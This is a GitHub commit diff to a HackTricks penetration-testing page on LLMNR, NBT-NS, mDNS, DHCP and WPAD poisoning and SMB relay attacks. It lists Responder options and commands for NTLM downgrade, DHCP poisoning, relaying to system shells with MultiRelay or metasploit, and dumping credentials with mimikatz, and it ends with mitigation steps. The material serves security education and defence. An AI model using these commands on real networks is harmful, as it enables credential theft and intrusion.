Skip to content

Commit

Permalink
Merge pull request HackTricks-wiki#306 from clem9669/responder-dhcp
Browse files Browse the repository at this point in the history 
Responder dhcp
  • Loading branch information
@carlospolop
carlospolop authored Mar 18, 2022
2 parents a1d87aa + d117060 commit 3c47e07
Showing 1 changed file with 84 additions and 26 deletions.
110 changes: 84 additions & 26 deletions ...pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
View file
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
# Spoofing LLMNR, NBT-NS, mDNS/DNS, DHCP and WPAD and Relay Attacks

## Network protocols

Expand All @@ -21,25 +21,72 @@ Responder automates the WPAD attack—running a proxy and directing clients to a

## Responder

> Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to _specific_ NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)). By default, the tool will only answer to File Server Service request, which is for SMB.
> Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)). By default, the tool will only answer to File Server Service request, which is for SMB.
>
> The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.
[**Responder**](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in _/etc/responder/Responder.conf_\
__You can find here **Responder for windows** here: [https://github.com/lgandx/Responder-Windows](https://github.com/lgandx/Responder-Windows)__\
__To run default Responder behaviour you only have to execute:
[Responder](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in _/etc/responder/Responder.conf_

You can find here Responder for **windows** [here](https://github.com/lgandx/Responder-Windows)

> Responder works in ipv4 & **ipv6**

Options are the following :

```text
--version show program's version number and exit
-h, --help show this help message and exit
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
BROWSER, LLMNR requests without responding.
-I eth0, --interface=eth0
Network interface to use, you can use 'ALL' as a
wildcard for all interfaces
-i 10.0.0.21, --ip=10.0.0.21
Local IP to use (only for OSX)
-6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
Poison all requests with another IPv6 address than
Responder's one.
-e 10.0.0.22, --externalip=10.0.0.22
Poison all requests with another IP address than
Responder's one.
-b, --basic Return a Basic HTTP authentication. Default: NTLM
-d, --DHCP Enable answers for DHCP broadcast requests. This
option will inject a WPAD server in the DHCP response.
Default: False
-D, --DHCP-DNS This option will inject a DNS server in the DHCP
response, otherwise a WPAD server will be added.
Default: False
-w, --wpad Start the WPAD rogue proxy server. Default value is
False
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
Upstream HTTP proxy used by the rogue WPAD Proxy for
outgoing requests (format: host:port)
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
retrieval. This may cause a login prompt. Default:
False
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
authentication for the proxy. WPAD doesn't need to be
ON. This option is highly effective when combined with
-r. Default: False
--lm Force LM hashing downgrade for Windows XP/2003 and
earlier. Default: False
--disable-ess Force ESS downgrade. Default: False
-v, --verbose Increase verbosity.
```

To run default Responder behaviour you only have to execute:

```bash
responder -I <Iface>
responder -I <Iface> -Pv
```

![](<../../.gitbook/assets/image (172).png>)

An interesting technique is to use responder to downgrade the NTLM authentication when possible. This will allow to **capture NTLMv1 challenges and responses** instead of NTLMv2 that can be **easily cracked** [**following this guide**](../../windows/ntlm/#ntlmv1-attack)**.**

```bash
#Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"
responder -I <Iface> --lm #Downgrade NTLM authntication if possible
responder -I <Iface> --lm --disable-ess #Downgrade NTLM authntication if possible and force ESS downgrade
```

By **default**, the **WPAD impersonation won't be executed**, but you can execute it doing:
Expand All @@ -48,12 +95,6 @@ By **default**, the **WPAD impersonation won't be executed**, but you can execut
responder -I <Iface> --wpad
```

Responder can also send **fake DNS responses** (so the IP of the attacker is resolved) and can inject **PAC files** so the victim will get the IP of the **attacker as a proxy**.

```bash
responder.py -I <interface> -w On #If the computer detects the LAN configuration automatically, this will impersonate it
```

You can also **resolve NetBIOS** requests with **your IP**. And create an **authentication proxy**:

```bash
Expand All @@ -64,13 +105,30 @@ You won't be able to intercept NTLM hashes (normally), but you can easily grab s

The **logs and the challenges** of default _**Responder**_ installation in kali can be found in `/usr/share/responder/logs`

### Capturing credentials
## DHCP Poisoning

Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution.

Spoofing DHCP responses with no disruption can be challenging since you're interfering with a workstation network configuration. Usually, you need to have very good knowledge of the target subnet, where is the DNS server, where is the switch, routing table, domain, netmask, DHCP server, etc. **Any mistake with these settings will result in disruption on the network.**

However, spoofing DHCP answers has unique benefits. **It's definitely stealthier than ARP poisoning**; One unicast response is sufficient to permanently poison a victim's routing information, it's also common to see multiple DHCP servers operating on a network. Unicast DHCP answers are more complex to detect, a few switch provides security settings to prevent DHCP snooping, however those settings are not straightforward and are often misconfigured when enabled.

> This attack is highly effective and gives you assured NTLMv1/2 hashes.
```bash
./Responder.py -I eth0 -rPdv
```


## Capturing credentials

Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" (most probably a **NTLMv2 Challenge/Response**):

It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.

![](<../../.gitbook/assets/poison (1) (1).jpg>)

## **Inveigh**
## Inveigh

> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
Expand All @@ -80,17 +138,18 @@ Responder is going to **impersonate all the service using the mentioned protocol

## Relay Attack

**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)****
**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)

This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\
This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.
Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.

The 3 main **tools** to perform this attack are: **smb\_relay** (metasploit), **MultyRelay** (responder), and **smbrealyx** (impacket).

Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in ** **_**/usr/share/responder/Responder.conf**_ and then execute responder on the desired **interface**: `responder -I eth0 -rv`
Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in **/usr/share/responder/Responder.conf** and then execute responder on the desired **interface**: `responder -I eth0 -rv`

You can perform this attack using **metasploit module**: `exploit/windows/smb/smb_relay`

You can perform this attack using **metasploit module**: `exploit/windows/smb/smb_relay`\
The option `SRVHOST` is used to point the server **were you want to get access**.\
The option `SRVHOST` is used to point the server **were you want to get access**.
Then, when **any host try to authenticate against you**, metasploit will **try to authenticate against the other** server.

You **can't authenticate against the same host that is trying to authenticate against you** (MS08-068). **Metasploit** will **always** send a "_**Denied**_" **response** to the **client** that is trying to connect to you.
Expand All @@ -114,8 +173,6 @@ python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
**At this point you can shut off Responder; we don’t need it anymore.**\
**With the shell access we have obtained, there are many actions that we can perform directly from here:**

![Step 41 | Intrinium.com](https://intrinium.com/wp-content/uploads/step41.png)

**Mimikatz** commands can also be performed directly **from the shell**. Unfortunately, the target used for this tutorial’s antivirus ate my mimikatz, but the following commands can be executed to run mimikatz, as well as the entire pallette of modules.: **`Mimi sekurlsa::logonpasswords`**

## InveighZero
Expand All @@ -133,7 +190,7 @@ In Windows you **may be able to force some privileged accounts to authenticate t

## Solution

### **Disabling LLMNR**
### Disabling LLMNR

To disable LLMNR in your domain for DNS clients, open gpedit.msc.\
Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\
Expand Down Expand Up @@ -161,7 +218,7 @@ Select the option “001 Microsoft Disable Netbios Option” from the list and c

![](../../.gitbook/assets/5.jpg)

### **WPAD**
### WPAD

To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS zone. Note that the DNS entry does not need to point to a valid WPAD server. As long as the queries are resolved, the attack will be prevented.

Expand All @@ -181,7 +238,8 @@ To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS

## References

**Images from:** [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
**Images from:**
[https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)\
[https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)\
[https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)\
[https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html)

0 comments on commit 3c47e07

Please sign in to comment.